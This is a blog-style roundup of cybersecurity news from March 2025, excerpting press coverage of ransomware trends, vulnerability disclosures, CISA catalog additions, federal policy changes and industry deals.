  • A new report out today from cybersecurity company SquareX Inc. is warning of a dangerous new evolution in ransomware: browser-native attacks that bypass traditional defenses and put millions of users at risk.
  • “Browser-based ransomware differs from traditional ransomware that relies on downloaded files to infect systems in that the ransomware operates entirely within the browser and requires no download. Instead, the attack targets the victim’s digital identity, taking advantage of the shift toward cloud-based enterprise storage and the fact that browser-based authentication has become the primary gateway to accessing these resources.
  • “In a case study published by SquareX last week, the attacks leverage AI agents to automate the majority of the attack sequence, requiring minimal social engineering and interference from the attacker.”

• The Hacker News tells us,
  • “In what’s an instance of hacking the hackers, threat hunters have managed to infiltrate the online infrastructure associated with a ransomware group called BlackLock, uncovering crucial information about their modus operandi in the process. 
  • “Resecurity said it identified a security vulnerability in the data leak site (DLS) operated by the e-crime group that made it possible to extract configuration files, credentials, as well as the history of commands executed on the server.
  • ‘The flaw concerns a “certain misconfiguration in the Data Leak Site (DLS) of BlackLock Ransomware, leading to clearnet IP addresses disclosure related to their network infrastructure behind TOR hidden services (hosting them) and additional service information,” the company said.”

• Security Week lets us know
  • “Ransomware Shifts Tactics as Payouts Drop: Critical Infrastructure in the Crosshairs
    Threats themselves change very little, but the tactics used are continually revised to maximize the criminals’ return on investment and effort.”

From the cybersecurity defenses front,

• Cyberscoop reminds us,
  • “Despite glitches and possible funding potholes along the road, experts have nothing but praise and optimism for the CVE program’s future. “It’s not perfect by any means, but it has stood the test of time,” Art Manion, a longtime CVE expert and deputy director of ANALYGENCE Labs, speaking in his personal capacity, told CyberScoop. “A world without CVE in it would get pretty ugly.”
  • “MITRE’S Summers says, “It’s been 25 years of this program, and I don’t know if it’s possible to name another such public-private partnership program that has lasted that long and has continued to be so impactful in an ongoing way. I’m excited about the opportunity to continue evolving in ways that bring value to the community.”
  • “Empirical Security’s Roytman echoes the enthusiasm of his peers when he says, “The fact that we’ve gotten together as an industry and have this public good, and vendors build whole products off of it is wonderful and excellent and should continue to improve.”

• Dark Reading offers “5 Considerations for a Data Loss Prevention Rollout; Strong DLP can be a game-changer — but it can also become a slow-moving, overcomplicated mess if not executed properly,” while SC Media provides “5 steps to protect against macOS security gaps.”

• Here is a link to Dark Reading’s CISO Corner.

From the cybersecurity policy and law enforcement front,

• NextGov/FCW lets us know,
  • “A cornerstone federal program that certifies the security architecture of private sector cloud services for government use is expected to announce a fundamental overhaul to its processes on Monday [March 24], according to multiple people familiar with the matter.
  • “The moves, in the long term, are expected to automate many of the certification process steps for the Federal Risk and Authorization Management Program, or FedRAMP, which is used to ensure cloud providers meet strict cybersecurity requirements before government agencies can use their services, according to the people, who were granted anonymity to be candid about the forthcoming changes.
  • “FedRAMP has been a mainstay in government procurement for the last decade but has faced repeated complaints about the slow pace of cloud service approvals. FedRAMP has different approval levels that vary based on the sensitivity of the data a cloud service can handle, with higher levels requiring stricter security controls and generally longer review processes.”
• and
  • “Despite goals set last year by the National Institute of Standards and Technology to process a backlog of unanalyzed cybersecurity vulnerabilities, the agency said it’s not expecting a slowdown anytime soon.
  • “The National Vulnerability Database — NIST’s cornerstone repository for researchers who use its contents and measuring tools to assess the dangers of cyber exploits — has been backed up with unanalyzed vulnerabilities since February last year. The scientific standards agency was projected to clear the logjam this month based on rates observed this past summer, Nextgov/FCW previously reported.
  • “But NIST said Wednesday that vulnerability submissions increased 32% in 2024 and prior processing rates from spring and early summer last year are no longer sufficient to keep up with incoming submissions. The backlog is still growing as a result.
  • “We anticipate that the rate of submissions will continue to increase in 2025. The fact that vulnerabilities are increasing means that the NVD is more important than ever in protecting our nation’s infrastructure. However, it also points to increasing challenges ahead,” an agency spokesperson said. “To address these challenges, we are working to increase efficiency by improving our internal processes, and we are exploring the use of machine learning to automate certain processing tasks.”

• Per a March 21, 2025, HHS news release,
  • “Today, the U.S. Department of Health and Human Services (HHS), Office for Civil Rights (OCR) announced a settlement with Health Fitness Corporation (Health Fitness), located in Illinois, that provides wellness plans to clients across the country, resolving a potential violation under the Health Insurance Portability and Accountability Act of 1996 (HIPAA) Security Rule.” * * *
  • “The settlement resolves OCR’s investigation of Health Fitness, which OCR initiated after receiving four reports from Health Fitness, over a three-month period (October 15, 2018, to January 25, 2019), of breaches of unsecured protected health information.  Health Fitness filed the breach reports on behalf of multiple covered entities as their business associate.  Health Fitness reported that beginning approximately in August 2015, ePHI became discoverable on the internet and was exposed to automated search devices (web crawlers) resulting from a software misconfiguration on the server housing the ePHI. Health Fitness discovered the breach on June 27, 2018.  Health Fitness initially reported that approximately 4,304 individuals were affected and later estimated that the number of individuals affected may be lower.  OCR’s investigation determined that Health Fitness had failed to conduct an accurate and thorough risk analysis, until January 19, 2024, to determine the potential risks and vulnerabilities to the ePHI held by Health Fitness.
  • “Under the terms of the resolution agreement, Health Fitness agreed to implement a corrective action plan that OCR will monitor for two years and paid $227,816 to OCR.” * * *
  • The resolution agreement and corrective action plan may be found at:  https://www.hhs.gov/sites/default/files/health-fitness-ra-cap.pdf [PDF, 202 KB].

From the cybersecurity breaches and vulnerabilities front,

• Cyberscoop tells us,
  • “Cybercriminals used information-stealing malware to a devastating effect last year, capturing sensitive data that fueled ransomware, breaches and attacks targeting supply chains and critical infrastructure, according to a new report.
  • “Infostealers were used to steal 2.1 billion credentials last year, accounting for nearly two-thirds of 3.2 billion credentials stolen from all organizations, Flashpoint said in a report released Tuesday. By targeting identity and access, cybercriminals stole 33% more credentials in 2024 compared to the previous year. More than 200 million credentials were already stolen in the first two months of this year.
  • “Infostealers are proving to be incredibly versatile, contributing to account takeover, increasing data breach totals, acting as initial access vectors to ransomware, as well as assisting in exploitation via vulnerabilities,” Ian Gray, vice president of intelligence at Flashpoint, said in an email.”

• Security Week informs us,
  • “Browser security cannot be ignored. It’s where people spend most of their working day, and it’s where attackers focus most of their attacks.
  • “Statistics come from Menlo Security’s analysis of 750,000 browser-based phishing attacks targeting more than 800 entities detected over the last 12 months. This analysis reveals a 140% increase in browser phishing, including a 130% increase in zero-hour phishing attacks (effectively, a zero-day attack applied to phishing).
  • “The reasons for the growth are multiple: our growing reliance on the browser for much of our daily work, the prevalence of zero-day vulnerabilities, the increasing sophistication of the cybercriminal underworld, and, worryingly, the growing influence of gen-AI. Gen-AI is particularly concerning, both for its use today and its potential use in the future.
  • “Threat actors have advanced in speed and skills. They are using the same tools and infrastructure as professional engineers,” comments Andrew Harding, VP of security strategy at Menlo Security. “We’re seeing a dangerous combination of zero-day attacks, advanced social engineering techniques, sophisticated phishing techniques, and readily available phishing-as-a-service kits, all designed to infiltrate systems and steal valuable data.”
  • “He adds, “This trend is only poised to escalate dramatically in 2025 as attackers adopt AI to increase both scale and effectiveness.”

• Dark Reading adds,
  • “A nearly decade-long malware campaign known as “DollyWay World Domination” has compromised more than 20,000 WordPress websites over the past eight years.
  • “GoDaddy published a report this week claiming multiple threat campaigns tracked by various security researchers since 2016 are actually one larger operation perpetrated by VexTrio, a massive cybercrime network that leverages traffic distribution systems (TDSs) and lookalike domains to deliver malware and scams.
  • “GoDaddy’s Denis Sinegubko wrote in the company’s research blog that the operation is tracked as DollyWay World Domination due to a string of code found in variations of the DollyWay malware: “define(‘DOLLY_WAY’, ‘World Domination’);”.
• and
  • “Mobile phone jailbreaks are thriving, exposing users to anywhere between three- and 3,000-times greater risk of cyber compromise.
  • “Organizations already face a significant risk in bring your own device (BYOD) attacks. More than 70% of infected devices are personal, and a good chunk of organizations have watched as malware entered their walls through unmanaged devices belonging to employees.
  • “The risk is supercharged, though, when those devices are cracked. New data from Zimperium shows that rooted and jailbroken Android phones and iPhones are 3.5 times more likely to be infected with malware and 250 times more likely to be totally compromised.
  • “What we’ve seen is that the amount of jailbreaks and roots has decreased slightly in recent years,” says Kern Smith, vice president of global solutions engineering at Zimperium. However, he warns, “The risk of those has increased significantly. These jailbreaks and roots expose these devices to a much, much higher risk profile. And mobile devices in general are being exposed to a much higher risk profile today. So it becomes a multiplier effect.”
    
• Per Fedscoop,
  • “The Federal Bureau of Investigation has warned federal employees that cybercriminals are attempting to steal their login credentials in connection to a widely used government financial services platform, according to a notice viewed by FedScoop. 
  • “Hackers are targeting the Employee Personal Page, or MyEPP page, which is operated by the National Finance Center (NFC), a financial and human resources shared service within the Agriculture Department used by 661,000 employees across the federal government for payroll. The site, which is used to manage salary and benefits information, is typically accessed through an online account or with Login.gov credentials. 
  • “According to the FBI, cybercriminals hope to trick federal employees by running advertisements on search engines that impersonate the NFC website. If they click on the ad, employees are brought to a “sophisticated phishing website” that looks similar to the actual MyEPP page that aims to capture their login credentials when users enter them.”

• Per Bleeping Computer,
  • “Veeam has patched a critical remote code execution vulnerability tracked as CVE-2025-23120 in its Backup & Replication software that impacts domain-joined installations.
  • “The flaw was disclosed yesterday and affects Veeam Backup & Replication version 12.3.0.310 and all earlier version 12 builds. The company fixed it in version 12.3.1 (build 12.3.1.1139), which was released yesterday.
  • “According to a technical writeup by watchTowr Labs, who discovered the bug, CVE-2025-23120 is a deserialization vulnerability in the Veeam.Backup.EsxManager.xmlFrameworkDs and Veeam.Backup.Core.BackupSummary .NET classes.”

• Cybersecurity Dive tells us,
  • At least 11 state-sponsored threat groups since 2017 have been actively exploiting a Microsoft zero-day flaw allowing for abuse of Windows shortcut files to steal data and commit cyber espionage against organizations in various industries.
  • Researchers from Trend Micro’s Trend Zero Day Initiative (ZDI) have identified nearly 1,000 malicious .lnk files abusing the flaw, tracked as ZDI-CAN-25373, which allows attackers to execute hidden malicious commands on a victim’s machine by leveraging crafted shortcut files.
  • “By exploiting this vulnerability, an attacker can prepare a malicious .lnk file for delivery to a victim,” according to a Trend Micro blog post on Tuesday. “Upon examining the file using the Windows-provided user interface, the victim will not be able to tell that the file contains any malicious content.”
  • “The malicious files delivered by attackers include various payloads, including the Lumma infostealer and Remco’s remote access Trojan (RAT), that expose organizations to risks of data theft and cyber espionage.”

• CISA added five known exploited vulnerabilities to its catalog this week.
  • March 18, 2025
    • CVE-2025-24472 Fortinet FortiOS and FortiProxy Authentication Bypass Vulnerability
    • CVE-2025-30066 tj-actions/changed-files GitHub Action Embedded Malicious Code Vulnerability
      • Dark Reading discusses the Fortinent KVE here, and Cybersecurity Dive discusses the Github KVE here.
  • March 19, 2025
    • CVE-2025-1316 Edimax IC-7100 IP Camera OS Command Injection Vulnerability
    • CVE-2024-48248 NAKIVO Backup and Replication Absolute Path Traversal Vulnerability
    • CVE-2017-12637 SAP NetWeaver Directory Traversal Vulnerability
      • Hacker News discusses the Edimax KVE here and the NAVIKO KVE here. Cybersecurity News discusses the SAP KVE here.

• Cybersecurity Dive adds,
  • Johannes Ullrich of the SANS Internet Storm Center reported exploitation attempts this week against two critical Cisco vulnerabilities that were initially disclosed in September. CVE-2024-20439 is a static credential vulnerability in the Cisco Smart Licensing Utility, and CVE-2024-20440 is an information disclosure flaw in the utility. 
  • It’s unclear if the exploitation was successful, but Ullrich noted the static credential for CVE-2024-20439 was previously published by a security researcher and could be used to remotely access affected devices.
  • Ullrich told Cybersecurity Dive the exploitation attempts likely originate from a smaller botnet, with activity spiking over the last week.

• Fierce Healthcare lets us know,
  • “A new report by Clearwater Security found that incident response and resilience was a major issue for private equity-owned healthcare companies, which need to improve consistency in cybersecurity governance in light of their high-growth business model.
  • “The assessment found systemic gaps in security preparedness, as healthcare organizations need more documented policies for cybersecurity practices from provider practices to digital health companies. Private equity firms need to consider the cybersecurity risk profiles of companies when deciding whether to acquire them or merge them with other businesses, Clearwater writes.
  • “Because private equity firms prioritize rapid growth of their portfolio companies, Clearwater found that health IT infrastructures and cybersecurity practices often fall behind. A cybersecurity incident can devalue a company overnight or rack up regulatory fines, a dangerous prospect for PE firms.
  • “The report looked at consumer health companies, healthcare data and analytics companies and physician practices owned by private equity firms. It also evaluated pharma, biosciences and dental services companies.”

From the ransomware front,

• Cybersecurity Dive reports,
  • “A Medusa ransomware campaign is using a malicious driver to disrupt and even delete endpoint detection and response (EDR) products on targeted organization networks.
  • “According to new research from Elastic Security Labs, the malicious driver, dubbed ABYSSWORKER, is deployed along with a packer-as-a-service called HeartCrypt to deliver Medusa ransomware. Elastic noted the driver was first documented in a ConnectWise post in January involving a different campaign of IT support scams using Microsoft Teams.
  • “In the Medusa ransomware attacks, Elastic discovered the malicious driver imitates a legitimate CrowdStrike Falcon driver and is using digital certificates from other companies to masquerade as a legitimate program. 
  • “All samples are signed using likely stolen, revoked certificates from Chinese companies,” Cyril François, senior research engineer at Elastic Security Labs, wrote in the blog post. “These certificates are widely known and shared across different malware samples and campaigns but are not specific to this driver.”

• Per Bleeping Computer,
  • “Two malicious VSCode Marketplace extensions were found deploying in-development ransomware, exposing critical gaps in Microsoft’s review process.
  • “The extensions, named “ahban.shiba” and “ahban.cychelloworld,” were downloaded seven and eight times, respectively, before they were eventually removed from the store.
  • “It is notable that the extensions were uploaded onto the VSCode Marketplace on October 27, 2024 (ahban.cychelloworld) and February 17, 2025 (ahban.shiba), bypassing safety review processes and remaining on Microsoft’s store for an extensive period of time.”

• Per Trend Research,
  • “Trend Research uncovered new versions of the Albabat ransomware. The development of these versions signifies the ransomware operators’ potential expansion of their targets from Windows to Linux and macOS. Research also reveals the group’s use of GitHub to streamline operations.
  • “Enterprises should remain vigilant against ransomware threats like Albabat as a successful attack can incur reputational damage, operational disruption, and financial losses once threat actors get a hold of and ransom critical data.
  • “To mitigate Albabat ransomware, organizations should have strong access controls for sensitive data, update and patch systems regularly and have proper backups.”

• Per TechSpot,
  • “Akira, one of the most dangerous ransomware strains floating around the internet, just met its match — an Indonesian programmer armed with cloud computing and sheer determination.
  • “As first reported by TechSpot, Yohanes Nugroho successfully cracked Akira, a multiplatform ransomware that has been wreaking havoc since 2023. Used by cyber criminals to target hundreds of businesses, government agencies, and industries, Akira has helped its developers earn millions.
  • “While this isn’t the first time someone has found a way to break Akira’s encryption, what makes this case remarkable is that Nugroho did it alone — and in just over 10 hours.”

From the cybersecurity business and defense front,

• NextGov/FCW reports,
  • “Google has moved to expand the security aspects of its cloud offering by agreeing to acquire Wiz in a $32 billion all-cash transaction, the global tech giant’s largest-ever.
  • “Wiz generates roughly $1 billion in annual revenue with FedRAMP-authorized cloud security products in areas such as prevention, active detection and response.
  • “Google sees the addition of Wiz as helping it support more agencies as they look to move their systems into multi-cloud and hybrid cloud environments.
  • “At the same time, software and (artificial intelligence) platforms are becoming deeply embedded across products and operations, bringing new and evolving risks for private enterprises, governments, and other public sector organizations,” Google Cloud CEO Thomas Kurian said in a release.”

• Dark Reading explains why “Cyber Quality Is the Key to Security. The time to secure foundations, empower teams, and make cyber resilience the standard is now — because the cost of waiting is far greater than the investment in proactive security.”

• TechTarget offers “13 API security best practices to protect your business. APIs are the backbone of most modern applications, and companies must build in API security from the start. Follow these guidelines to design, deploy and protect your APIs.”

• Here are links to
  • Dark Reading’s CISO Corner
  • A HelpNetSecurity video about “Pay, fight, or stall? The dilemma of ransomware negotiations”
  • A Cyberscoop podcast in which its editor in chief “Greg Otto talks with FTI Consulting’s Allie Bohan exploring the challenges organizations face in maintaining effective communication during cyberattacks.”
  • The FEHBlog watched the seven-minute-long video and listed to the podcast while drafting this post and he found them worthwhile.